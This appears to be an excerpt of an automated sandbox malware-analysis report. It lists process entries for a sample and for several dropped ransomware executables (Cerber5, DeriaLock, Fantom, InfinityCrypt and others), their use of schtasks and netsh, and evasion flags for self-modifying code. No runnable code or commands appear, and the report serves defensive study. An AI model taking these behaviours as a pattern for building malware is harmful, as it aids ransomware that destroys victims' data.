        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\3d3t2wty.l1d\Endermanch@NoMoreRansom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\3d3t2wty.l1d\Endermanch@NoMoreRansom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\3d3t2wty.l1d\Endermanch@NoMoreRansom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\3d3t2wty.l1d\Endermanch@NoMoreRansom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 00000000004011AF instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 000000000040167A instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 0000000000401A79 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 0000000000401D19 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 0000000000401483 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 00000000004289F3 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 00000000004026BC instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 000000000042B245 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 00000000004241B1 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 00000000004244B9 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 00000000004266AB instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 0000000000426F0D instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 0000000000426903 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 0000000000423F1D instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 00000000004263F8 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 0000000000424BA3 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 00000000004286EE instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 000000000042888A instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 000000000042BA6F instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 000000000042A9D8 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 00000000004297F5 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 0000000000428548 instructions caused by: Self-modifying code
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeSpecial instruction interceptor: First address: 00000000004011AF instructions caused by: Self-modifying code
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeSpecial instruction interceptor: First address: 000000000040167A instructions caused by: Self-modifying code
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeSpecial instruction interceptor: First address: 0000000000401A79 instructions caused by: Self-modifying code
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeSpecial instruction interceptor: First address: 0000000000401D19 instructions caused by: Self-modifying code
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeSpecial instruction interceptor: First address: 0000000000401483 instructions caused by: Self-modifying code
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeSpecial instruction interceptor: First address: 00000000004289F3 instructions caused by: Self-modifying code
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeSpecial instruction interceptor: First address: 00000000004026BC instructions caused by: Self-modifying code
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeSpecial instruction interceptor: First address: 000000000042B245 instructions caused by: Self-modifying code
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeSpecial instruction interceptor: First address: 00000000004241B1 instructions caused by: Self-modifying code
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeSpecial instruction interceptor: First address: 00000000004244B9 instructions caused by: Self-modifying code
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeSpecial instruction interceptor: First address: 00000000004266AB instructions caused by: Self-modifying code
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeSpecial instruction interceptor: First address: 0000000000426F0D instructions caused by: Self-modifying code
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeSpecial instruction interceptor: First address: 0000000000426903 instructions caused by: Self-modifying code
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeSpecial instruction interceptor: First address: 0000000000424BA3 instructions caused by: Self-modifying code
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeSpecial instruction interceptor: First address: 00000000004286EE instructions caused by: Self-modifying code
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeSpecial instruction interceptor: First address: 000000000042888A instructions caused by: Self-modifying code
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeSpecial instruction interceptor: First address: 0000000000428548 instructions caused by: Self-modifying code
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeSpecial instruction interceptor: First address: 0000000000427E90 instructions caused by: Self-modifying code
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeSpecial instruction interceptor: First address: 0000000000425D85 instructions caused by: Self-modifying code
